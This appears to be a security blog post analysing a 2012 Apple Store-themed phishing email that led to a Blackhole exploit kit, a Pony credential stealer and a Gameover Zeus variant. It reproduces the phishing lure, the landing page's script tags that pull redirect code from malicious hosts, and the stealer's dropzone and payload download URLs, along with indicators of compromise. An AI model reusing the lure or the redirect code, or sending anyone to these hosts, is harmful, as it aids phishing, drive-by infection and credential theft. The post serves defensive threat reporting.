Thank you for your order

On 2012-03-29 we observed an Apple Store-themed spam. The observed sample had a subject line of “Thank you for your order” and the following text:

Dear Customer,

Thank you for shopping at Apple Store.

Here is a notice that your Order Number: W259985718 has been successfully charged to your credit card for 4,200.10 USD.

Please CLICK HERE to see your ORDER.

Your Apple Store Customer Service Team

This email contained a link to www.horizontefc.com.br/y2yMPUY4/index.html. Hmm, that pattern definitely looks familiar, right? It sure is ..

Predictably, the malicious link contained the following html code with the request javascript redirects:

<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”http://telefonspass24.de/w2ziooxT/js.js”></script&gt;
<script type=”text/javascript” src=”http://gpatrol.com/XwWWQjzf/js.js”></script&gt;

These javascripts redirected victims to a Blackhole Exploit kit at http://88.85.99.44:8080/showthread.php?t=d7ad916d1c0396ff.

This Blackhole Exploit unfortunately contained an upgraded Java Exploit (CVE-2012-0507). The malicious .jar file dropped by this kit had the following properties:

File: Pol.jar
Size: 14765
MD5: 8E300391CB3011ED76390C021E20F728

The kit then dropped the following Pony downloader:

File: readme.exe
Size: 150569
MD5: C1D691E2FCE076E58463DB5F5DF441CA

The Pony downloader was configured to send stolen FTP credentials to the following dropzones:

http://50.56.208.113:8080/pony/gate.php
http://83.174.131.142:8080/pony/gate.php

The Pony downloader then downloaded a Gameover Zeus variant from the following locations:

http://fragmanist.com/ngjYq.exe
http://genxlogistics.com/wE68.exe

This Zeus variant had the following properties:

Size: 319528
MD5: A374A4151C893BA731833E60655FAD26

This Zeus variant had a botid of “NR29”.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: